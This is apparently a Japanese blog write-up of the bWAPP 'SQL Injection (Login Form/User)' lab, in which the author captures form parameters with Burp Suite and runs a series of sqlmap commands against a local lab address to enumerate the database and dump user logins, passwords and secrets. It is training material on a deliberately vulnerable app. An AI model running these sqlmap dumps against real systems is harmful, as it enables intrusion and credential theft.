shikata ga nai

Private? There is no such things.

bWAPPでA1-SQL Injection(Login Form/User)

Hello there,

 

A1 ⇨ SQL Injection(Login Form/User)を選択して。

いつものインジェクションを試してみると。

うまくいかず。

 

f:id:ThisIsOne:20191229072551p:plain

 

もう一発、インジェクションを試すと。

システムエラーが表示され、MySQLを使用していると。

 

f:id:ThisIsOne:20191229072355p:plain

 

とりあえず、適当にLoginとPasswordを入力して。

 

f:id:ThisIsOne:20191229071115p:plain

 

Burp Suiteで、パラメータを抜き取って。

 

f:id:ThisIsOne:20191229070441p:plain

 

別途、Kali linuxを起動して。

下記のようにsqlmapで調べることに。

※ここでbWAPPのURLは、『locahost』でなく実際のIPアドレスに変更しておくこと。

 sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" --dbs

 

f:id:ThisIsOne:20191229071219p:plain

 

データベース名がわかったので、次はテーブルを。 

 sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" -D bWAPP --tables

 

f:id:ThisIsOne:20191229071419p:plain

 

次にテーブル内のカラムを。 

 sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" -D bWAPP -T users --columns

 

f:id:ThisIsOne:20191229071712p:plain

 

最後に格納されているデータをダンプして。

これで、LoginとPasswordがわかった。 

 sqlmap -u "http://172.17.0.2/sqli_16.php" --cookie="security_level=0; PHPSESSID=ro7rd16pkig4tho1igrjabgor6" --data "login=neo&password=pass&form=submit" -D bWAPP -T users -C login,password,secret --dump

 

f:id:ThisIsOne:20191229072137p:plain

 

sqlmapをじっくりと勉強したわけでなく。

数をこなすことで、少しずつ抵抗もなくなり使い方の手順もわかってくるかと。

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain